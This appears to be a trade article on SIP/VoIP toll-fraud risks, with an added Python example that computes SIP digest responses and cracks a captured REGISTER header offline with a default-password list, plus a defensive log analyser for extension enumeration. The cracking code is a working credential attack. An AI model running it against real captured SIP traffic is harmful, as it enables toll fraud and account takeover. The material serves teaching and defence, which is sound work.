1. Inadequate user authentication and access control. Toll fraudsters have gained access to enterprise PBXs because user authentication and access controls are inadequate in many deployments. Most often the problem is weak or default passwords. Many enterprises deploy robust authentication mechanisms, such as two-factor authentication, to secure data traffic, but they neglect to extend the same level of access control and authentication to their telephony end-points.
2. A security architecture that relies solely on session border controllers (SBCs) or media gateways (MGs). As components of the typical SIP-based VoIP architecture, SBCs provide critical network interoperability and demarcation functionality and help to manage the boundaries between networks when terminating SIP trunks. However, SBCs and MGs are not dedicated security devices, and the limits of their authentication, access control, encryption and threat-mitigation functionality can leave them open to application-layer attacks. Examples include reconnaissance that maps internal systems and enumerates valid extensions to attack, and attackers logging in with spoofed identities to gain access to the PSTN.
3. VLAN management. Virtual LANs are frequently used to logically segregate voice and data traffic and then to 'bridge' the two networks for UC-related applications. But VLAN separation is easily defeated by a moderately sophisticated attacker. Furthermore, an attacker who remotely takes control of a PC running a VoIP softphone client can compromise the entire VoIP and data network from it. VLAN separation is not a comprehensive security measure and must be supplemented by others.
4. Encryption errors. Some security breaches that lead to toll fraud start with inadequate use of encryption, which allows user credentials to be intercepted and misused. Inadequate use of encryption is one of the chief security lapses in VoIP deployments: it is frequently deployed for external communications that cross the Internet or another untrusted network, but frequently not used on internal networks, even though many breaches could have been prevented by it. It is also important not to be misled into thinking that encryption alone equals security. Encryption provides privacy, and an attack launched from a compromised end-point travels through an encrypted channel just as easily as legitimate traffic does.
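Points 1 and 4 above are two halves of one failure: when SIP signalling runs in the clear on the internal network, a sniffer on the voice VLAN captures the REGISTER challenge and the phone's digest response, and a weak or default password then falls to an offline dictionary attack that never touches the PBX again (no lockout, no log line). The following is an added example, not code from the original article or from any vendor product: it implements the RFC 3261 / RFC 2617 digest computation an IP phone performs, simulates the phone side against a constructed challenge (the realm, nonce and extension numbers are made up), and runs the attacker's offline guess loop against the captured header. The password list is constructed to illustrate the "password equals extension" and common-default cases.

```python
"""SIP digest authentication and why clear-text SIP plus a weak password is enough for toll fraud.

Added example, not code from the original article. The exchange is constructed: the realm,
nonce and extension numbers are made up, and the 'phone' side is simulated in software.
"""
import hashlib
import re


def _md5(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """RFC 3261 / RFC 2617 digest response exactly as an IP phone computes it."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    if qop == "auth":
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


# key="quoted value" or key=bare-token, comma separated
_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_digest_params(header: str) -> dict:
    """Split a WWW-Authenticate / Authorization header into its Digest parameters."""
    body = header.split("Digest", 1)[1]
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in _PARAM_RE.finditer(body)}


# Constructed 401 challenge, as the PBX would send it in reply to a REGISTER.
CHALLENGE = ('WWW-Authenticate: Digest realm="pbx.example.com", '
             'nonce="5f1d2c8a9b3e4d7c", algorithm=MD5, qop="auth"')
REGISTER_URI = "sip:pbx.example.com"


def phone_register(extension: str, password: str) -> str:
    """Simulate the phone's authenticated REGISTER. On an unencrypted voice VLAN this
    header, together with the challenge above, is exactly what a sniffer captures."""
    p = parse_digest_params(CHALLENGE)
    nc, cnonce = "00000001", "0a4f113b"
    resp = digest_response(extension, p["realm"], password, "REGISTER", REGISTER_URI,
                           p["nonce"], p["qop"], nc, cnonce)
    return (f'Authorization: Digest username="{extension}", realm="{p["realm"]}", '
            f'nonce="{p["nonce"]}", uri="{REGISTER_URI}", response="{resp}", '
            f'algorithm=MD5, qop=auth, nc={nc}, cnonce="{cnonce}"')


# Constructed guess list: the defaults a fraudster tries before anything else.
COMMON_VOIP_PASSWORDS = ["1234", "0000", "password", "admin", "123456", "welcome"]


def crack_captured_register(auth_header, method, wordlist):
    """Offline dictionary attack against one captured exchange. Every guess is a local
    hash computation, so there is no lockout and nothing for the PBX to log.
    Returns the recovered password or None."""
    p = parse_digest_params(auth_header)
    # 'password == extension' is the classic provisioning default, so try it first
    candidates = [p["username"]] + list(wordlist)
    for candidate in candidates:
        guess = digest_response(p["username"], p["realm"], candidate, method, p["uri"],
                                p["nonce"], p.get("qop"), p.get("nc"), p.get("cnonce"))
        if guess == p["response"]:
            return candidate
    return None


if __name__ == "__main__":
    weak = phone_register("1001", "1001")             # password equals extension
    strong = phone_register("1002", "Tq7!pX9#wL2m")   # long random secret
    print("weak account   ->", crack_captured_register(weak, "REGISTER", COMMON_VOIP_PASSWORDS))
    print("strong account ->", crack_captured_register(strong, "REGISTER", COMMON_VOIP_PASSWORDS))
```

The strong password survives the same capture only because the guess list never reaches it; it is the combination of TLS on the signalling path (so nothing is captured) and non-default, non-numeric per-device secrets that closes this route, and either measure alone leaves the other lapse in place.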
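The reconnaissance described under point 2, mapping the PBX and enumerating valid extensions before trying to log in, leaves a recognisable trace in the PBX's own logs even when the SBC in front of it reports nothing. The following is an added example, not code from the original article: it runs simple detection logic over constructed registration-failure lines. The line format is modelled on Asterisk chan_sip "Registration from ... failed" notices but is an assumption, as are the thresholds, which should be tuned to the site.

```python
"""Spotting SIP reconnaissance in PBX logs: extension enumeration and password guessing.

Added example, not code from the original article. The log format is modelled on Asterisk
chan_sip 'Registration from ... failed' notices (assumed, not verified against a live box);
the lines themselves are constructed and the thresholds are assumptions to tune per site.
"""
import re
from collections import defaultdict

NOTICE_RE = re.compile(
    r"\[(?P<ts>[^\]]+)\] NOTICE\[\d+\] chan_sip\.c: Registration from '(?P<from>[^']*)' "
    r"failed for '(?P<ip>[\d.]+):\d+' - (?P<reason>.+)$"
)
EXT_RE = re.compile(r"sip:([^@>]+)@")


def _notice(ts, ext, ip, reason):
    """Build one constructed log line in the assumed format."""
    return (f"[{ts}] NOTICE[2171] chan_sip.c: Registration from "
            f"'\"{ext}\" <sip:{ext}@pbx.example.com>' failed for '{ip}:5060' - {reason}")


# Constructed sample: a scanner walking extensions 1000-1011, a guesser hammering one
# account, and a single mistyped internal login that should not raise an alert.
SAMPLE_LOG = (
    [_notice(f"2019-03-27 02:14:{s:02d}", 1000 + s, "203.0.113.5", "No matching peer found")
     for s in range(12)]
    + [_notice(f"2019-03-27 02:20:{s:02d}", 2001, "198.51.100.7", "Wrong password")
       for s in range(6)]
    + [_notice("2019-03-27 09:01:10", 1042, "10.0.0.23", "Wrong password")]
)


def parse_failures(lines):
    """Yield (source_ip, extension, reason) for each registration failure; skip other lines."""
    for line in lines:
        m = NOTICE_RE.search(line)
        if not m:
            continue
        ext = EXT_RE.search(m.group("from"))
        yield m.group("ip"), (ext.group(1) if ext else "?"), m.group("reason")


def analyze(lines, max_failures=5, max_extensions=5):
    """Return {source_ip: verdict} for sources that look like reconnaissance or brute force.

    Enumeration shows as many *distinct* extensions from one source; password guessing as
    many failures against *few* extensions. A lone failure from a workstation matches neither.
    """
    failures = defaultdict(int)
    extensions = defaultdict(set)
    for ip, ext, _reason in parse_failures(lines):
        failures[ip] += 1
        extensions[ip].add(ext)
    verdicts = {}
    for ip, count in failures.items():
        if len(extensions[ip]) >= max_extensions:
            verdicts[ip] = "extension enumeration"
        elif count >= max_failures:
            verdicts[ip] = "password guessing"
    return verdicts


if __name__ == "__main__":
    for ip, verdict in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {verdict}")
```

The distinction between "No matching peer found" and "Wrong password" is itself information a scanner uses to tell real extensions from unused ones; a PBX that answers every failed attempt identically on the wire (on Asterisk, `alwaysauthreject=yes` in sip.conf) removes that signal from the attacker while the log still records it for the defender. Feeding these verdicts to an automatic source-address block is the usual next step, and the thresholds should be set with a time window in production rather than over a whole file as here.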
Guy Koster, Director of Product Marketing at Westcon Convergence, commented: “Moving telephony off dedicated infrastructures on to the IP network, although an enabler to a richer multi-media communications experience, brings with it a number of new challenges. VARs must be educated, and then trained to understand these issues and their implications and be able to act as a trusted advisor to their customers. When it comes to toll fraud, ignorance is not bliss.” Toll fraud is not the only threat that enterprises face. Other examples of known exploits include:
1. Via an HTTP command it is possible to remotely activate the microphone on conference handsets in meeting rooms and record conversations.
2. There is the equivalent of a key-logger for IP phones, which records not only the numbers dialled but also any keys pressed to enter passcodes, PINs and the like.
3. It is possible to inject unauthorised video into video streams, e.g. in teleconferencing applications or IP video surveillance systems. As Max Clifford wrote (Radio Times, 25 July) with reference to the alleged News of the World scandal, 'Phone tapping? It's more widespread than people thought', and it is much more sophisticated.
The increasing adoption of SIP trunks, combined with the evolving UC market, creates new opportunities for fraudsters and increased risk to corporations, but the benefits outweigh the risks as long as those risks are understood, managed and mitigated.